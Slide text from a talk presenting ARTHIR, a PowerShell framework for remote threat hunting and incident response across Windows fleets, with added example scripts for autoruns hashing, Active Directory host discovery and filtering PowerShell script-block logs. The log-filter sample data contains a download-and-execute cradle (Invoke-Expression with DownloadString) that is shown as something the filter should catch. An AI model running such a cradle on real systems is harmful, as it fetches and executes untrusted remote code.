2. Whoami
• Blue Team Defender Ninjas, Incident Responder, Threat Hunter, Logaholic
• Michael – Creator of all those Windows Logging Cheat Sheets and the Malware Management Framework
• Co-Creator of “Log-MD” – The Log and Malicious Discovery Tool
• BDIR Podcast - “Brakeing Down Incident Response”
• Special SHOUT OUT to
– Olaf Hartong @OlafHartong
– Josh Rickard @MSAdministrator
LOG-MD.com
4. So what’s the problem?
• There is an event
• We would like to investigate it
• We walk in with our laptops
– Or you use one of your systems
• What tools can you or we use to look across all your Windows systems?
• Without installing anything!!!!
• Using what is already on all Windows systems
5. What are our options?
• Use what we already have like SCCM, BigFix, etc.
• Install a tool with an agent, deal with more agent bloat and agent interaction
• Remote into the system
• Do a forensics acquisition
• Use what is already on the system, living-off-the-land
• What we need is already found on all Windows systems!
• How can we share what we do with enterprise solutions?
• Use something the community can contribute to
6. The Challenge
• Whether you are a Blue Teamer investigating your own environment
• Or a consultant investigating a client
• We need a way to execute a wide range of tools, utilities and scripts remotely to 1, 100 or 1000 systems
• It needs to be flexible enough to allow us to run, respond, and hunt for many things
LOG-MD.com
7. Requirements
• Fits on a thumb drive
• Can run scripts
• Can run tools (no GUI)
• Can run utilities (no GUI)
• Can run larger jobs (Hash/Registry snapshots)
• Schedule Jobs that can run things on a regular basis
8. Requirements
• Walk in with a laptop
• Or use one of your systems
• Domain attached and domain creds
• No requirement to install anything
• Well… we want you to upgrade to PowerShell v5
• PS v5 is the only way to get good PowerShell logging
– You didn’t think I wasn’t going to mention the Malware Archaeology Cheat Sheets, did you?
9. What do you have and use?
• What tools do you use for Threat Hunting and Incident Response?
• A bunch of utilities, tools, scripts?
• An EDR/EPP solution?
• Open Source tools and projects?
• Do you have anything?
• More importantly do you have budget?
10. My Top 10 List of tools
1. Log Management
– Centralize data collection
– Query all the data
2. BigFix or equivalent
– Query anything you want on a system
– Run scripts, utilities, tools, etc.
– Run remediation jobs
3. LOG-MD
– Log Harvesting
– Hunting
– AutoRuns
– PowerShell
– SRUM
– Much more
12. The problem I wanted to solve
• I want to query all the things #2
• I want to run scripts, utilities, tools #2
• I want to have the option to centralize the data #1
• I want to query that data #1
• I don’t want to, or can’t install anything
• Of course I want to run my favorite utility/tool
– LOG-MD-Professional
13. The problem I wanted to solve
• I am one of the creators of LOG-MD
• It is a great utility/tool
• It does a LOT of what I need to investigate a system
• I just needed a way to run it remotely on 1, 100 or 1000 systems to do Threat Hunting and/or Incident Response
• And pull back the reports and organize them
• Maybe even collect them into a Log Management solution #1
• Without an enterprise solution like BigFix #2
15. 3 years ago…
• We announced LOG-MD at this very conference
• Today we would like to announce the release of…
ATT&CK Remote Threat Hunting Incident Response
ARTHIR.com
16. PowerShell?
• PowerShell is on every Windows system
• Can we use that?
• But can we run our own special binaries?
• We love our own tools
• Create scripts
• Something modular
• Allows for community support
17. • A modular framework
• Leverages an existing project that we modified to do what we wanted and needed
• KANSA was good, but lacked some capabilities
• I needed to run all features of LOG-MD and pull the reports back
• KANSA did not work well at all for LOG-MD
• And run other utilities, say Sysinternals
18. • So KANSA did some kewl stuff, just not enough
• So we modified it
• We had a couple issues
• Olaf Hartong helped us with report retrieval
• Josh Rickard helped us with scheduled tasks
• Once these changes were added suddenly we had something that gave me a LOT of what BigFix could do
20. What does ATT&CK have to do with it?
• We LOVE MITRE ATT&CK
• It is a GREAT place to map your hunts to
• Or what to detect and hunt for
• It’s what your adversaries ACTUALLY do in their attacks
• If you can detect and/or hunt for the techniques in MITRE ATT&CK… you are WAY ahead of most
21. MITRE ATT&CK™
• The A in ARTHIR stands for ATT&CK™
• The idea here is to encourage you and anyone making modules to map their efforts to MITRE ATT&CK
• Help us Help the rest of us
• Take this information and any other detection and hunting you can do and add it to YOUR own ATT&CK Matrix
22. Add your ATT&CK Mappings
• Check MITRE ATT&CK Tactics and Techniques and add them to the ARTHIR module
• Map them to an overall matrix
23. Cheat Sheets
• We released two ATT&CK cheat sheets as a part of my SANS THIR talk in NOLA last year
• The goal was to see how good, or bad really good logging would be for detecting or hunting the techniques in ATT&CK
• It was shocking how much coverage there was
• Over 80%
25. Remote
• The R in ARTHIR stands for Remote
• We need to be able to hunt and respond remotely
• Execute what we want on 1, 10, 100, or 1000 systems
• And not 1 by 1 like you would have to with RDP or some EDRs
• Bring back results to a central system
• Like BigFix can do
26. Threat Hunting
• The TH in ARTHIR stands for Threat Hunting
• We need to be able to hunt for artifacts from the techniques the adversaries use
• Run additional tools and utilities to hunt
• Centrally send results to say… log management
27. Incident Response
• The IR in ARTHIR stands for Incident Response
• We need to be able to respond to an attack
• Do additional investigation from an alert
• Run additional tools and utilities
• Centrally send results to say… log management
28. Modular
• We used the KANSA framework
• Even ported a few of the KANSA modules
• This framework design worked for us, no reason to totally reinvent the wheel
• Create a module, add it to modules.conf
• Run the execution parameters
• Retrieve the reports
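What a module looks like under the create-it, list-it-in-modules.conf, run-it, pull-the-reports flow, as an added example that is not a module shipped with ARTHIR or KANSA. It follows the KANSA conventions the slides say ARTHIR kept: a `# OUTPUT` directive on the first line chooses the report format, the script emits objects, and the module is enabled by adding its relative path to modules.conf. The file name (ASEP\Get-RunKeyAutoruns.ps1) and the ATT&CK mapping column are our choices; the technique it maps to is Registry Run Keys / Startup Folder (T1547.001). Whether ARTHIR parses the directive exactly as KANSA does is an assumption to check against the templates it ships.

```powershell
# OUTPUT tsv
# Added example module (not one shipped with ARTHIR or KANSA): list the
# Run/RunOnce autostart values on the host it executes on and hash each
# target binary so the report can be compared across 1, 100 or 1000 systems.
# Assumed conventions are KANSA's: first-line "# OUTPUT" picks the report
# format, objects written to the pipeline become the report, and the module
# is enabled by adding ASEP\Get-RunKeyAutoruns.ps1 (our name) to modules.conf.

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run'
    # HKCU is the hive of the account the module runs under. Run remotely
    # with admin creds, these are that admin's entries, not the logged-on
    # user's, so treat HKCU rows from a remote run accordingly.
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

foreach ($key in $runKeys) {
    if (-not (Test-Path -Path $key)) { continue }
    $item = Get-ItemProperty -Path $key
    # Get-ItemProperty adds PS* note properties describing the provider; skip them.
    $values = $item.PSObject.Properties |
        Where-Object { $_.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$' }
    foreach ($v in $values) {
        # Expand %SystemRoot%-style variables so the path can be resolved.
        $cmd = [Environment]::ExpandEnvironmentVariables([string]$v.Value)
        # First token is the executable, quoted or not; the rest are arguments.
        $exe = if ($cmd -match '^"([^"]+)"') { $Matches[1] } else { ($cmd -split '\s+')[0] }
        $hash = $null
        if ($exe -and (Test-Path -LiteralPath $exe -PathType Leaf)) {
            $hash = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
        }
        [PSCustomObject]@{
            Host    = $env:COMPUTERNAME
            Key     = $key
            Name    = $v.Name
            Command = $cmd
            Exe     = $exe
            SHA256  = $hash          # $null when the target file cannot be found
            ATTACK  = 'T1547.001'    # Registry Run Keys / Startup Folder
        }
    }
}
```

A null SHA256 is itself worth a look: a Run value whose target is missing, or is given as a bare name that resolves through the PATH, is a common thing to hunt for. The ATTACK column is what lets the report be rolled up into your own ATT&CK matrix once the results land in log management.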
29. RECON
• We provided some PowerShell scripts to get system names from Active Directory
• You need to build a list of systems
• And we provided a Ping script so you can test those system names are alive
• Add these to Hosts.txt to run your modules against
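The recon step end to end, as an added example that is not the recon or Ping script shipped with ARTHIR: query Active Directory for computer objects, ping each one, and write the responders one per line to Hosts.txt. It assumes the ActiveDirectory module (RSAT) is present on the analyst laptop and that the domain account running it can read computer objects; the OU, the staleness window and the output path are placeholders.

```powershell
# Added example (not ARTHIR's own recon scripts): build Hosts.txt from
# Active Directory, keeping only hosts that answer a ping.
# Assumes the ActiveDirectory module (RSAT) and domain creds that can read
# computer objects. SearchBase, StaleDays and OutFile are placeholders.

param(
    [string]$SearchBase = 'OU=Workstations,DC=example,DC=local',   # placeholder OU
    [string]$OutFile    = '.\Hosts.txt',
    [int]$StaleDays     = 30   # skip machines with no AD logon inside this window
)

Import-Module ActiveDirectory -ErrorAction Stop

# 1. Enabled Windows computer objects that have authenticated recently.
#    LastLogonDate comes from the replicated lastLogonTimestamp, which by
#    default is only refreshed when older than 14 days, so allow for that lag.
$cutoff = (Get-Date).AddDays(-$StaleDays)
$candidates = Get-ADComputer -SearchBase $SearchBase `
        -Filter 'Enabled -eq $true -and OperatingSystem -like "*Windows*"' `
        -Properties OperatingSystem, LastLogonDate |
    Where-Object { $_.DNSHostName -and $_.LastLogonDate -ge $cutoff } |
    Select-Object -ExpandProperty DNSHostName |
    Sort-Object -Unique

Write-Host ("{0} candidate hosts from AD" -f @($candidates).Count)

# 2. One ping each; -Quiet makes Test-Connection return $true/$false
#    instead of reply objects, which is all we need here.
$alive = foreach ($name in $candidates) {
    if (Test-Connection -ComputerName $name -Count 1 -Quiet -ErrorAction SilentlyContinue) {
        $name
    } else {
        Write-Warning "No reply from $name, left out of $OutFile"
    }
}

# 3. Plain ASCII, one host per line, the format the module runner reads.
@($alive) | Set-Content -Path $OutFile -Encoding ASCII
Write-Host ("{0} reachable hosts written to {1}" -f @($alive).Count, $OutFile)
```

The ping is a liveness hint, not proof a host is down: a machine whose host firewall drops ICMP will be warned about and skipped even though WinRM may be reachable, so keep the warnings and decide case by case whether to add those names back to Hosts.txt.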
30. Available modules
• Several more popular KANSA modules have been converted
• More will be done as we move forward and need them
• We provided templates so YOU can do it too
• Remember that ‘community can contribute’ statement from earlier?
39. You will make PowerShell noise
• Since ARTHIR uses PowerShell…
• The adversaries use PowerShell
• You will add events to the PowerShell logs
• So test and whitelist the scriptblocks that ARTHIR creates
• Make it easier to hunt the bad
• LOG-MD provides a Whitelist_PowerShell.txt with many exclusions
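How the whitelisting plays out against the PowerShell log, as an added example that is neither LOG-MD nor ARTHIR code. With PS v5 script block logging on, every block runs through Event ID 4104 in Microsoft-Windows-PowerShell/Operational, including the ones your own hunting framework executes. The filter below drops blocks that match a list of wildcard patterns and hands back the rest. The whitelist format assumed here (one `-like` pattern per line, `#` comments) is ours; LOG-MD's Whitelist_PowerShell.txt has its own layout, so this reader is a stand-in for it, not a parser of that file. The sample events are constructed so the filter can be tried without touching an event log.

```powershell
# Added example (not LOG-MD or ARTHIR code): keep known-good script blocks out
# of the hunt. Whitelist format assumed: one wildcard pattern per line, '#'
# starts a comment. Live events come from Event ID 4104, where the third
# event data field is the ScriptBlockText.

function Read-Whitelist {
    param([Parameter(Mandatory)][string[]]$Lines)
    $Lines | ForEach-Object { $_.Trim() } |
        Where-Object { $_ -and -not $_.StartsWith('#') }
}

function Select-UnlistedScriptBlocks {
    # Returns the events whose script text matches none of the patterns.
    param(
        [Parameter(Mandatory)][object[]]$Events,    # objects carrying ScriptBlockText
        [Parameter(Mandatory)][string[]]$Patterns   # -like wildcard patterns
    )
    foreach ($e in $Events) {
        $listed = $false
        foreach ($pat in $Patterns) {
            if ($e.ScriptBlockText -like $pat) { $listed = $true; break }
        }
        if (-not $listed) { $e }
    }
}

function Get-ScriptBlockEvents {
    # Live read of 4104 events; Properties[2] is the ScriptBlockText field.
    param([int]$MaxEvents = 5000)
    Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104
    } -MaxEvents $MaxEvents -ErrorAction SilentlyContinue | ForEach-Object {
        [PSCustomObject]@{
            TimeCreated     = $_.TimeCreated
            ScriptBlockText = $_.Properties[2].Value
        }
    }
}

# Constructed whitelist and sample events (not real log data) so the filter
# runs offline. The patterns describe blocks a collection run would produce.
$whitelist = Read-Whitelist -Lines @(
    '# blocks generated by the hunting framework itself'
    'Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run*'
    '*Test-Connection -ComputerName * -Count 1 -Quiet*'
)
$sample = @(
    [PSCustomObject]@{ TimeCreated = '2019-10-01 09:00'; ScriptBlockText = 'Get-ItemProperty -Path HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' }
    [PSCustomObject]@{ TimeCreated = '2019-10-01 09:01'; ScriptBlockText = 'Invoke-Expression (New-Object Net.WebClient).DownloadString("http://placeholder.invalid/x")' }
    [PSCustomObject]@{ TimeCreated = '2019-10-01 09:02'; ScriptBlockText = 'Test-Connection -ComputerName ws01 -Count 1 -Quiet' }
)
Select-UnlistedScriptBlocks -Events $sample -Patterns $whitelist | Format-Table -AutoSize

# Against the real log on a system: replace $sample with (Get-ScriptBlockEvents)
# and $whitelist with (Read-Whitelist -Lines (Get-Content .\your_whitelist.txt)).
```

With the constructed sample only the 09:01 block, the download cradle, survives the filter, which is the point of whitelisting your own noise first. Two things to watch in practice: patterns should be tight enough that an adversary cannot hide by prefixing their block with a whitelisted command, so anchor them at the start where you can, and long script blocks are logged as several 4104 fragments (MessageNumber of MessageTotal), so a pattern that matches the first fragment does not automatically cover the rest.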
45. Recommended Sites
OSSEM - Open Source Security Events Metadata
• https://github.com/Cyb3rWard0g/OSSEM
SOCPrime SIGMA to SIEM converter
• https://uncoder.io/
SIGMA - Generic Signature Format for SIEM Systems
• https://github.com/Neo23x0/sigma
Red Canary Atomic Red Team
• https://atomicredteam.io/
MATE - MITRE ATT&CK® Technique Emulation
• https://github.com/fugawi/mate
Atomic Threat Coverage
• https://github.com/krakow2600/atomic-threat-coverage
46. Recommended Sites
The ThreatHunter-Playbook
• https://github.com/Cyb3rWard0g/ThreatHunter-Playbook
Olaf Hartong
ThreatHunting | A Splunk app mapped to MITRE ATT&CK to guide your threat hunts
• https://github.com/olafhartong/ThreatHunting
Sysmon-modular | A Sysmon configuration repository for everybody to customize
• https://github.com/olafhartong/sysmon-modular
48. Questions
• You can find us on the Twitters
– @HackerHurricane
• LOG-MD.com
• MalwareArchaeology.com
• Preso will be on SlideShare and linked on MalwareArchaeology.com
• Listen to the PodCast to hear the rest of this topic
– http://www.brakeingdownir.libsyn.com/